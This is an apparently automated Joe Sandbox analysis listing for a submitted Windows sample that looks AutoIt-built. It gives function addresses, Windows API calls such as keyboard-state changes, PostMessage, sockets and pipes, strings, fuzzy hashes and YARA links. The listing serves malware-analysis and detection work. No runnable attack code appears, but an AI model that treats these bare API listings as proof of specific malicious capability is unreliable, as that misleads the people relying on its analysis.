Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: c41b900befd41e07418062332aa3c022b370596e64b995784c640368e1cca4fc
Instruction ID: e7fbfce5b77e4366f7187f831aa81a4daf129431522ea796f8fae5c1aa909dfd
Opcode Fuzzy Hash: c41b900befd41e07418062332aa3c022b370596e64b995784c640368e1cca4fc
Instruction Fuzzy Hash: BA91A571E202267ADB208EF4E841EEEBBB59FA9310F580569E805E7181D725CD70CBA0

Function 00264523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00264648
VariantInit.OLEAUT32(?), ref: 00264749
VariantClear.OLEAUT32(?), ref: 00264753
VariantClear.OLEAUT32(?), ref: 002647B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0026472C
Null Object assignment in FOR..IN loop, xrefs: 002645D8, 00264706, 002647BE

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 09cdb886c1c0f00a7dac8d5b9cda99c6042c10efe641f6cf853849150d447dad
Instruction ID: 30272711517092beff976ae884172cd4dba02d75a932bbb1a323f511c582afc5
Opcode Fuzzy Hash: 09cdb886c1c0f00a7dac8d5b9cda99c6042c10efe641f6cf853849150d447dad
Instruction Fuzzy Hash: F491C371A20219AFDF20DFA4CC84FAEB7B8EF46714F108559F545AB280D7709995CFA0

Function 00251187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0025125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00251284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 002512A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002512D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0025135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002513C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00251430

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: d356bdba0eae2d3404d3d362da938869574e36a0cee33162bd178d77fc96db79
Instruction ID: 388aa0a498f2ea1b27b1f70ec567dd59b26eb7300335603ffcca68aa68e88252
Opcode Fuzzy Hash: d356bdba0eae2d3404d3d362da938869574e36a0cee33162bd178d77fc96db79
Instruction Fuzzy Hash: 04910371A20219AFEB00DFA4D895BBE77B5FF44316F104029ED00E7291D7B4A969CF98

Function 001F948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 78dc20941552df9b207a24e458f92d55d1d413fcdab2222e8ea69920466e1e43
Instruction ID: 6b626bd718b68014c806628ba898ee1155047e74d4cca41d216c7e0e310b8c47
Opcode Fuzzy Hash: 78dc20941552df9b207a24e458f92d55d1d413fcdab2222e8ea69920466e1e43
Instruction Fuzzy Hash: 0F913AB1D00219EFCB14DFA9CC88AEEBBB8FF49320F14455AE615B7261D375A941CB60

Function 00263947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0026396B
CharUpperBuffW.USER32(?,?), ref: 00263A7A
_wcslen.LIBCMT ref: 00263A8A
VariantClear.OLEAUT32(?), ref: 00263C1F

Part of subcall function 00250CDF: VariantInit.OLEAUT32(00000000), ref: 00250D1F
Part of subcall function 00250CDF: VariantCopy.OLEAUT32(?,?), ref: 00250D28
Part of subcall function 00250CDF: VariantClear.OLEAUT32(?), ref: 00250D34

Strings

Incorrect Parameter format, xrefs: 002639A6, 00263BA1
AUTOIT.ERROR, xrefs: 00263A80, 00263A85

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: a83c505c3bf61a94a4e5d44cb927e7e002475ec0d7a56d5a3c087d33116fad03
Instruction ID: c6e20a080f82a6bb7dc4449e14cd23b5413913e5bb95db7b4871a4997f7621aa
Opcode Fuzzy Hash: a83c505c3bf61a94a4e5d44cb927e7e002475ec0d7a56d5a3c087d33116fad03
Instruction Fuzzy Hash: 589144746287459FC704EF64C48196AB7E4FF89314F14882EF88A9B351DB30EE95CB92

Function 00264BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0024000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?,?,0024035E), ref: 0024002B
Part of subcall function 0024000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240046
Part of subcall function 0024000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?,?), ref: 00240054
Part of subcall function 0024000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0023FF41,80070057,?), ref: 00240064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00264C51
_wcslen.LIBCMT ref: 00264D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00264DCF
CoTaskMemFree.OLE32(?), ref: 00264DDA

Strings

NULL Pointer assignment, xrefs: 00264E23, 00264E52

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 4ab2abaf1b4b61e70bf189f39e9857b5883efcc125218d57aca3ac5bc3258c18
Instruction ID: fb3044032cfbe85f06204f5cfd97db33e80b025e7cec6ca8c67f44cd26dc98ac
Opcode Fuzzy Hash: 4ab2abaf1b4b61e70bf189f39e9857b5883efcc125218d57aca3ac5bc3258c18
Instruction Fuzzy Hash: B1913771D1021DAFDF14EFA4D881EEEB7B8BF08304F50816AE955A7251DB309A94CF60

Function 002720FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00272183
GetMenuItemCount.USER32(00000000), ref: 002721B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002721DD
_wcslen.LIBCMT ref: 00272213
GetMenuItemID.USER32(?,?), ref: 0027224D
GetSubMenu.USER32(?,?), ref: 0027225B

Part of subcall function 00243A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00243A57
Part of subcall function 00243A3D: GetCurrentThreadId.KERNEL32 ref: 00243A5E
Part of subcall function 00243A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002425B3), ref: 00243A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002722E3

Part of subcall function 0024E97B: Sleep.KERNEL32 ref: 0024E9F3

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 01432b92f8ddd7d6a91e4e4485b094897dd25dd17151410bdfdfdcb8126fa80f
Instruction ID: d4cec0b4d60caf9f5a6588fb3599c231ec339d9bca2ac07e0762c6469ecab2b3
Opcode Fuzzy Hash: 01432b92f8ddd7d6a91e4e4485b094897dd25dd17151410bdfdfdcb8126fa80f
Instruction Fuzzy Hash: DF718D75A10205EFCB10DF69C885AAEB7F5FF48310F148499E81AEB342DB74EE558B90

Function 0024AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0024AEF9
GetKeyboardState.USER32(?), ref: 0024AF0E
SetKeyboardState.USER32(?), ref: 0024AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0024AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0024AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0024AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0024B020

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 4fd1eece3ba6e26f914cbc28f686ed1c755fcf4455a61c41ec767022f61556eb
Instruction ID: 8c72ede99a3711460848573fbb1da50a4c03d1d7d5d54b4dc299645ee95d58b2
Opcode Fuzzy Hash: 4fd1eece3ba6e26f914cbc28f686ed1c755fcf4455a61c41ec767022f61556eb
Instruction Fuzzy Hash: 8951D4A0A647D63DFB3B86348C45BBB7EE95B06304F088489E1D9498C2C3D9EDE8D751

Function 0024ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0024AD19
GetKeyboardState.USER32(?), ref: 0024AD2E
SetKeyboardState.USER32(?), ref: 0024AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0024ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0024ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0024AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0024AE38

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 13b3a295c2fa0c9c17551b5ca26b7536787ccf83124720e1767ee6a98e65fc21
Instruction ID: bdfc5b0092fec81045aecd28d9aca49a15bdbef5c97004eb9a56d54d65835bb7
Opcode Fuzzy Hash: 13b3a295c2fa0c9c17551b5ca26b7536787ccf83124720e1767ee6a98e65fc21
Instruction Fuzzy Hash: EE51F9A1AA87D67DFB3F87348C85B7A7E985F45300F088498E1E54A8C3C294ECA4D752

Function 0021542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00223CD6,?,?,?,?,?,?,?,?,00215BA3,?,?,00223CD6,?,?), ref: 00215470
__fassign.LIBCMT ref: 002154EB
__fassign.LIBCMT ref: 00215506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00223CD6,00000005,00000000,00000000), ref: 0021552C
WriteFile.KERNEL32(?,00223CD6,00000000,00215BA3,00000000,?,?,?,?,?,?,?,?,?,00215BA3,?), ref: 0021554B
WriteFile.KERNEL32(?,?,00000001,00215BA3,00000000,?,?,?,?,?,?,?,?,?,00215BA3,?), ref: 00215584

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 01c2a91544710546312965cca041a7fe493c5cea1c3d271bbf5482090b3d83ea
Instruction ID: 1db92c435b47c0f23a9823f8ca2d5993efbc1903a8d8ea7a6ab3d088f0906e2a
Opcode Fuzzy Hash: 01c2a91544710546312965cca041a7fe493c5cea1c3d271bbf5482090b3d83ea
Instruction Fuzzy Hash: 8B510570A10609EFDB10CFA8D885BEEBBFAEF59300F14415AF555E3291D7309A91CB60

Function 002610B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0026304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0026307A
Part of subcall function 0026304E: _wcslen.LIBCMT ref: 0026309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00261112
WSAGetLastError.WSOCK32 ref: 00261121
WSAGetLastError.WSOCK32 ref: 002611C9
closesocket.WSOCK32(00000000), ref: 002611F9

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 67d598979932f0fc50ee05e8b58ef0d954a4036817706f6ce472bf5fbad3bf78
Instruction ID: 8545d21528b9e0b9151562f8f33cf6984e12002caef7b41978b4be84154c587e
Opcode Fuzzy Hash: 67d598979932f0fc50ee05e8b58ef0d954a4036817706f6ce472bf5fbad3bf78
Instruction Fuzzy Hash: D9411431210604AFDB109F24D888BAEB7E9EF46324F188099F9199B291C770BD91CBE1

Function 0024CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0024DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0024CF22,?), ref: 0024DDFD

Part of subcall function 0024DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0024CF22,?), ref: 0024DE16

lstrcmpiW.KERNEL32(?,?), ref: 0024CF45
MoveFileW.KERNEL32(?,?), ref: 0024CF7F
_wcslen.LIBCMT ref: 0024D005
_wcslen.LIBCMT ref: 0024D01B
SHFileOperationW.SHELL32(?), ref: 0024D061

Strings

\*.*, xrefs: 0024CFF3

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: ec74da9a5aa61b6f4568f0de53113000eb672be1ba8b0d957bcad977f5af8051
Instruction ID: 5f83144a87b17275691cbe54199a8b80a1c58137a4b91fc9576c57ecfff34fbd
Opcode Fuzzy Hash: ec74da9a5aa61b6f4568f0de53113000eb672be1ba8b0d957bcad977f5af8051
Instruction Fuzzy Hash: A941A9719562199FDF16EFA4D981EDEB7B8AF04340F1100E6E509EB142EB34AA98CF10

Function 00272DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00272E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00272E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00272E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00272EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00272EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00272EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00272F0B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: b1e62178faac38a71ee29699f2e2d1a8d226ff90522846c648cdad8f85f930de
Instruction ID: 27df382bd67be7cf428175bd40023318fb837cccf19f1c7a9c178355ac2288c2
Opcode Fuzzy Hash: b1e62178faac38a71ee29699f2e2d1a8d226ff90522846c648cdad8f85f930de
Instruction Fuzzy Hash: 26311530614151DFDB21CF18EC98F6537E4EB8A710F154168F9489B2B2CB71B8A4DB41

Function 00247726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00247769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0024778F
SysAllocString.OLEAUT32(00000000), ref: 00247792
SysAllocString.OLEAUT32(?), ref: 002477B0
SysFreeString.OLEAUT32(?), ref: 002477B9
StringFromGUID2.OLE32(?,?,00000028), ref: 002477DE
SysAllocString.OLEAUT32(?), ref: 002477EC

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 2d199146e9893dc06aeeb264c04d2f7a8784573a659561443c837a1df90f3325
Instruction ID: 2ab4fa2322b9eac879f85c1df8f2be4ea06eded4aa9ba310b9202ea9fe3b9c47
Opcode Fuzzy Hash: 2d199146e9893dc06aeeb264c04d2f7a8784573a659561443c837a1df90f3325
Instruction Fuzzy Hash: 3021B276614219AFDB14EFB8DC88CBBB7ACEB093647508029FA29DB151D770DC8187A0

Function 002477FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00247842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00247868
SysAllocString.OLEAUT32(00000000), ref: 0024786B
SysAllocString.OLEAUT32 ref: 0024788C
SysFreeString.OLEAUT32 ref: 00247895
StringFromGUID2.OLE32(?,?,00000028), ref: 002478AF
SysAllocString.OLEAUT32(?), ref: 002478BD

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 6de54963e76d35bda40e56726a2cb9affee5afe832af10bd84dec7d23859e1dd
Instruction ID: 3fba38d4b2bb35f691b8ea3341a0706f0b0daa50c0b1c5a7e4f2a5bb19f1a14d
Opcode Fuzzy Hash: 6de54963e76d35bda40e56726a2cb9affee5afe832af10bd84dec7d23859e1dd
Instruction Fuzzy Hash: 74218331618205AFDB14AFB8DC8CDBA77ECEB097607108129F929DB2A1D770DC81DB64

Function 002504D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 002504F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0025052E

Strings

nul, xrefs: 00250567

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: a4bb7dc3fe840f9569867e1aaa2cede2b22bdda7c354d7e0120ebd9ca4af2411
Instruction ID: 81041f22f93feefc9b815eaa1ede6941fcb9eae0525c4070207d2fbc7b3da34d
Opcode Fuzzy Hash: a4bb7dc3fe840f9569867e1aaa2cede2b22bdda7c354d7e0120ebd9ca4af2411
Instruction Fuzzy Hash: 47219471910306AFDB209F39DC88A9A77B4BF44725F604A19FCA5E71E0E7709968CF24

Function 002505A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 002505C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00250601

Strings

nul, xrefs: 00250639

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

